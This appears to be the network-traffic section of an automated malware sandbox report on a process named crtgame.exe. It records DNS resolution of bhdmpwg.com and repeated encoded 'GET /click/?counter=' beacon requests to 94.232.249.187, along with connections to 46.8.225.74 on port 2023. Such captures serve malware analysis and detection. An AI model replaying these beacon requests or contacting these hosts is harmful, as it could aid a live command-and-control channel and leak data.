                                                                        Dec 14, 2024 03:03:50.655843019 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:50.655890942 CET804993694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:50.655985117 CET4993680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:50.655991077 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:50.656239986 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:50.776130915 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:52.004081011 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:52.004210949 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:52.113394022 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:52.234549999 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:52.613415003 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:52.613533020 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:52.722951889 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:52.843069077 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:53.218858004 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:53.219152927 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:53.332068920 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:53.332401037 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:53.452739954 CET804994494.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:53.452867031 CET804995194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:53.452877045 CET4994480192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:53.452986002 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:53.453154087 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:53.573158979 CET804995194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:54.800787926 CET804995194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:54.800879955 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:54.910211086 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.030378103 CET804995194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:55.411422014 CET804995194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:55.413208008 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.535222054 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.535624981 CET4995780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.655356884 CET804995194.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:55.655404091 CET804995794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:55.655508041 CET4995180192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.655703068 CET4995780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.655803919 CET4995780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:55.775429964 CET804995794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:57.005861044 CET804995794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:57.005944967 CET4995780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:57.113296032 CET4995780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:57.113593102 CET4996280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:57.233357906 CET804996294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:57.233568907 CET804995794.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:57.233649015 CET4996280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:57.233676910 CET4995780192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:57.233951092 CET4996280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:57.353574038 CET804996294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:58.578170061 CET804996294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:58.578327894 CET4996280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:58.693955898 CET4996280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:58.694297075 CET4996680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:58.813905001 CET804996294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:58.813963890 CET4996280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:58.814080000 CET804996694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:03:58.814157009 CET4996680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:58.814621925 CET4996680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:03:58.934376001 CET804996694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:00.162966013 CET804996694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:00.163080931 CET4996680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:00.286890030 CET4996680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:00.287262917 CET4997280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:00.407113075 CET804996694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:00.407175064 CET804997294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:00.407196999 CET4996680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:00.407253027 CET4997280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:00.407417059 CET4997280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:00.527092934 CET804997294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:01.756186008 CET804997294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:01.756259918 CET4997280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:01.865541935 CET4997280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:01.866076946 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:01.985856056 CET804997294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:01.985876083 CET804997694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:01.985935926 CET4997280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:01.985995054 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:01.986165047 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:02.105824947 CET804997694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:03.336361885 CET804997694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:03.336420059 CET804997694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:03.336492062 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.336576939 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.355494976 CET499792023192.168.2.546.8.225.74
                                                                        Dec 14, 2024 03:04:03.362832069 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.475425959 CET20234997946.8.225.74192.168.2.5
                                                                        Dec 14, 2024 03:04:03.475528002 CET499792023192.168.2.546.8.225.74
                                                                        Dec 14, 2024 03:04:03.475579023 CET499792023192.168.2.546.8.225.74
                                                                        Dec 14, 2024 03:04:03.475629091 CET499792023192.168.2.546.8.225.74
                                                                        Dec 14, 2024 03:04:03.483109951 CET804997694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:03.483247042 CET4997680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.586500883 CET4998280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.595516920 CET20234997946.8.225.74192.168.2.5
                                                                        Dec 14, 2024 03:04:03.595558882 CET20234997946.8.225.74192.168.2.5
                                                                        Dec 14, 2024 03:04:03.706536055 CET804998294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:03.706749916 CET4998280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.708288908 CET4998280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:03.828063965 CET804998294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:04.453275919 CET20234997946.8.225.74192.168.2.5
                                                                        Dec 14, 2024 03:04:04.455226898 CET499792023192.168.2.546.8.225.74
                                                                        Dec 14, 2024 03:04:05.046397924 CET804998294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:05.046643972 CET4998280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:05.162364960 CET4998280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:05.162708998 CET4998680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:05.282550097 CET804998694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:05.282665014 CET4998680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:05.282681942 CET804998294.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:05.282749891 CET4998280192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:05.282936096 CET4998680192.168.2.594.232.249.187
                                                                        Dec 14, 2024 03:04:05.402940989 CET804998694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:06.630875111 CET804998694.232.249.187192.168.2.5
                                                                        Dec 14, 2024 03:04:06.631011963 CET4998680192.168.2.594.232.249.187
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 14, 2024 03:02:53.840830088 CET6428953192.168.2.581.31.197.38
                                                                        Dec 14, 2024 03:02:54.074011087 CET536428981.31.197.38192.168.2.5
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 14, 2024 03:02:53.840830088 CET192.168.2.581.31.197.380xd864Standard query (0)bhdmpwg.comA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 14, 2024 03:02:54.074011087 CET81.31.197.38192.168.2.50xd864No error (0)bhdmpwg.com94.232.249.187A (IP address)IN (0x0001)false
                                                                        • bhdmpwg.com
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.54978894.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:02:54.257744074 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:02:55.599689007 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:02:55 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:02:55.707192898 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:02:56.223267078 CET1038INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:02:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 33 33 65 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 37 35 39 33 63 65 30 30 64 35 34 39 39 35 31 30 65 64 66 65 66 66 36 64 37 66 64 65 33 34 32 38 62 32 30 33 39 33 38 30 33 63 32 64 36 34 37 38 63 30 66 30 35 39 34 32 30 63 65 31 62 65 35 34 61 65 39 62 31 65 38 34 66 39 65 35 36 38 39 33 38 30 32 39 33 33 30 38 35 35 66 39 32 39 64 33 63 32 32 36 63 34 38 61 30 32 30 32 32 36 63 63 34 39 31 37 39 32 63 38 61 38 30 63 35 33 63 35 61 35 38 38 65 64 62 30 36 66 39 31 61 63 66 64 38 35 61 61 64 32 34 33 66 31 63 34 61 63 39 35 39 32 32 63 35 35 62 66 38 33 36 38 36 34 32 34 37 61 65 32 36 65 62 61 36 31 66 38 65 35 39 35 30 61 33 61 39 61 32 38 65 65 39 64 36 61 34 35 63 65 61 66 61 62 37 39 38 64 66 32 64 33 38 38 31 31 30 61 33 33 31 65 36 37 30 30 37 61 31 62 65 36 30 61 65 30 33 64 37 62 64 37 39 39 38 31 34 61 66 63 30 39 33 33 39 34 61 38 32 62 39 64 36 32 65 38 32 65 35 38 32 65 37 30 35 66 38 34 66 64 64 35 39 32 65 63 35 32 61 61 65 39 39 32 [TRUNCATED]
                                                                        Data Ascii: 33ede2ffe912c1a5259eb23643d6c02a7593ce00d5499510edfeff6d7fde3428b20393803c2d6478c0f059420ce1be54ae9b1e84f9e568938029330855f929d3c226c48a020226cc491792c8a80c53c5a588edb06f91acfd85aad243f1c4ac95922c55bf836864247ae26eba61f8e5950a3a9a28ee9d6a45ceafab798df2d388110a331e67007a1be60ae03d7bd799814afc093394a82b9d62e82e582e705f84fdd592ec52aae9924c07c13494990c3f1dff2717e482b3bb563f5b32b2823aac867663c1fff9d605241a049b7adf1d73721121d235bd800d2420c57fe13043e8af9c17b8496db8d114c31daaf4169ecfb72569ee25e8706f501469d24caf1a22454e873ca653d62a64cfcebd11f2806c5bb93c2c9e15479da511981043cd32690dc79165667144f95c3019ac49e2f6097d0c733671dbc2751d9d83f451e12b305e4ec72558459f0ec020da8a2f36d45165d915065bdf5acc3de1ba56014a12eea0b6407704fd65dc5f510268c4e71edded588ea32d6e7392645e8214bce414dc1aef01bfe94e4429fdfc1bbfa2718e58de59f2b76296dae739f98532e9841831e0
                                                                        Dec 14, 2024 03:02:59.629101992 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:00.188304901 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.54980594.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:00.421243906 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:01.776679039 CET900INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 32 62 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 63 30 65 35 35 38 32 34 65 30 66 64 62 65 37 61 36 39 31 62 39 61 35 32 62 63 65 36 64 36 31 37 63 35 62 63 66 64 64 35 33 64 63 34 38 35 66 63 62 34 39 38 39 35 61 65 61 34 31 66 36 62 62 66 36 34 34 39 39 35 36 39 37 33 39 30 61 39 32 32 66 38 35 34 37 39 61 39 63 33 66 33 63 36 65 34 36 61 31 33 66 32 34 37 37 63 39 39 32 36 37 32 64 38 38 38 32 64 61 33 36 35 66 34 63 38 65 64 33 30 37 65 37 31 30 63 39 63 37 35 64 62 33 32 66 33 35 31 65 35 34 63 62 35 63 32 61 64 61 35 63 66 38 32 32 38 32 34 61 34 36 62 30 32 63 65 64 62 62 31 62 39 30 35 30 35 32 61 33 62 37 61 33 38 39 66 63 64 36 61 35 35 36 66 65 66 61 62 30 39 61 63 31 32 37 33 39 38 35 30 62 62 63 33 39 65 64 37 62 31 38 61 30 62 39 37 65 61 34 30 32 64 63 62 31 36 36 39 61 31 30 61 63 64 35 39 31 33 65 35 37 39 64 62 66 64 32 32 36 39 64 65 34 38 32 65 30 31 30 66 30 34 33 63 30 35 31 32 39 64 62 32 62 61 61 39 37 33 [TRUNCATED]
                                                                        Data Ascii: 2b4de2fe88e261d4749b96478393969f80739fc0e55824e0fdbe7a691b9a52bce6d617c5bcfdd53dc485fcb49895aea41f6bbf644995697390a922f85479a9c3f3c6e46a13f2477c992672d8882da365f4c8ed307e710c9c75db32f351e54cb5c2ada5cf822824a46b02cedbb1b905052a3b7a389fcd6a556fefab09ac12739850bbc39ed7b18a0b97ea402dcb1669a10acd5913e579dbfd2269de482e010f043c05129db2baa973bc17e04414c93ddf2d2eb78674a253bab61f7ba3c2e3da2cd79673811e0986c454da257b3ace4d1393819182245da09d85e1155f4121a3f8cf3de7d888dd78a0f4830cfa84f70e4f977489aef48841cfd0444832ecdf6be3b55e867cf663d7caf4af1ffd01c2d18cab489ddccee5967d85e1e990725de298bdd7a1d4b640a489ec41f9bc19238668bd7c838791fb82a4ed0da294e1f13ad08e4f3655d865deeed0c02b4bef06a480b5f945570bdf5a3d8df1f940


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.54980894.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:02.124443054 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:03.473124981 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:03.582014084 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:04.077919960 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.54981494.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:04.311904907 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:05.664997101 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:05.769467115 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:06.269340038 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:06.378938913 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:06.873361111 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:06 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.54982394.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:07.108853102 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:08.485445976 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:08 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.54982594.232.249.187805460C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 14, 2024 03:03:08.718760967 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:10.100992918 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:09 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:10.208086967 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:10.708271980 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:10 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:10.816530943 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:11.317264080 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ede2ff49a2e11370
                                                                        Dec 14, 2024 03:03:11.426047087 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                        Host: bhdmpwg.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Dec 14, 2024 03:03:11.921869993 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Sat, 14 Dec 2024 02:03:11 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
